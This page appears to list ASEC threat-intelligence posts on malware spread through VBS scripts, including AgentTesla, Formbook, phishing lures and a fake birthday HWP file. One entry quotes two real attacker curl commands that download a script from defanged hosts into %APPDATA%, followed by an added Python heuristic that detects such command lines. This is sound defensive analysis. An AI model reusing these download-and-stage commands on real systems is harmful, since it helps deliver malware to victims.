AgentTesla Being Distributed via VBS Posted By jcleebobgatenet , October 31, 2022 The ASEC analysis team has recently identified that AgentTesla is being distributed through a malicious VBS. The script file contains several code blocks that have each been obfuscated multiple times. Last May, AgentTesla was found being distributed through a Windows Help file (*.chm), so its distribution method appears to change continuously. The VBS script is distributed as an email attachment, and emails impersonating Korean corporations have recently been identified. The compressed file contains the VBS, and…
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) Posted By jcleebobgatenet , September 1, 2022 The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The initial distribution path of the malware has yet to be determined, but the VBScript itself is downloaded with curl. The commands discovered so far are as follows:
curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\vbtemp
cmd /c cd > %appdata%\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\vbtemp
Both commands save the downloaded script in the %APPDATA% folder under the extension-less name vbtemp; the first spoofs a browser User-Agent header, and the second first writes the current directory to %appdata%\tmp~pth before chaining the download behind cmd /c. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript code that performs actions such as registering a scheduled task…
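The two curl commands above share a few traits that make them easy to triage from process-creation telemetry: curl writes its output under %APPDATA%, the file name has no extension, the User-Agent is a browser string rather than curl's own, and one of them is chained behind cmd /c. The following is an added example, not code from the ASEC post, that scores command lines against those traits; the sample command lines are constructed for the demonstration (the first two mirror the quoted commands, with the same defanged hosts, and the rest are benign decoys).

```python
"""Heuristic triage of process command lines for the curl-to-%APPDATA%
download chain described above. Added example; not ASEC's code."""
import re

# Constructed sample command lines: two mirror the post's commands, two are benign.
SAMPLE_CMDLINES = [
    r'curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\vbtemp',
    r'cmd /c cd > %appdata%\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\vbtemp',
    r'curl -sS https://example.com/index.html -o C:\Users\dev\Downloads\index.html',
    r'powershell -c Get-Process',
]

# Output path points into the roaming profile (either the env var or the expanded path).
_APPDATA_PATH = re.compile(r'%appdata%\\|\\AppData\\Roaming\\', re.IGNORECASE)
# curl invocation with an explicit output file; group(1) is the target path.
_CURL_OUTPUT = re.compile(r'\bcurl\b.*?\s(?:-o|--output)\s+(\S+)', re.IGNORECASE)
# Explicit User-Agent header passed with -H; group(1) is the header value.
_UA_HEADER = re.compile(r'-H\s+"?user-agent:\s*([^"]+)"?', re.IGNORECASE)
# curl launched as the second stage of a cmd /c ... && chain.
_CMD_CHAIN = re.compile(r'\bcmd(?:\.exe)?\s+/c\b.*?&&\s*curl\b', re.IGNORECASE)


def score_cmdline(cmdline: str) -> tuple[int, list[str]]:
    """Return (score, reasons) for one command line; score is the number of traits hit."""
    reasons = []
    out = _CURL_OUTPUT.search(cmdline)
    if out:
        target = out.group(1)
        if _APPDATA_PATH.search(target):
            reasons.append("curl output written under %APPDATA%")
        basename = re.split(r"[\\/]", target)[-1]
        if "." not in basename:
            reasons.append("output file has no extension (script staged under a neutral name)")
    ua = _UA_HEADER.search(cmdline)
    if ua and "curl" not in ua.group(1).lower():
        reasons.append("curl sends a browser User-Agent instead of its own")
    if _CMD_CHAIN.search(cmdline):
        reasons.append("curl chained behind cmd /c ... &&")
    return len(reasons), reasons


def scan(cmdlines, threshold: int = 2):
    """Return [(cmdline, score, reasons)] for every line hitting at least `threshold` traits."""
    flagged = []
    for cmd in cmdlines:
        score, reasons = score_cmdline(cmd)
        if score >= threshold:
            flagged.append((cmd, score, reasons))
    return flagged


if __name__ == "__main__":
    for cmd, score, reasons in scan(SAMPLE_CMDLINES):
        print(f"[score {score}] {cmd}")
        for reason in reasons:
            print("   -", reason)
```

A threshold of two keeps ordinary curl usage (a download into a user's Downloads folder with a normal file name) out of the alert queue while still catching either quoted command; in production the same scoring would run over Sysmon event ID 1 or EDR process-creation records rather than a static list.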
APT Attack Disguised as Resume Template for North Korean Defectors (VBS Script) Posted By jcleebobgatenet , April 1, 2022 The ASEC analysis team has recently discovered that an information-stealing VBS is being distributed via phishing emails disguised as North Korea-related material. The email advertises casting calls for a North Korea-related broadcast and carries a compressed attachment; it asks readers to fill out the enclosed resume, prompting them to run the file. The compressed file contains a malicious VBS script. The activities of ‘2022 Resume Template.vbs’ are as follows: Collects and sends information Creates…
Change in Distribution Method of Malware Disguised as Estimate (VBS Script) Posted By jcleebobgatenet , February 28, 2022 Last year, the ASEC analysis team discovered Formbook being distributed under a filename that used a certain company’s name. Recently, the team found that it is now being distributed via a VBS file. The email used for distribution still contains details about a request for an estimate, and the attachment still carries the company’s name to prompt the user to execute it. The compressed file attached to the email no longer contains an executable but a VBS…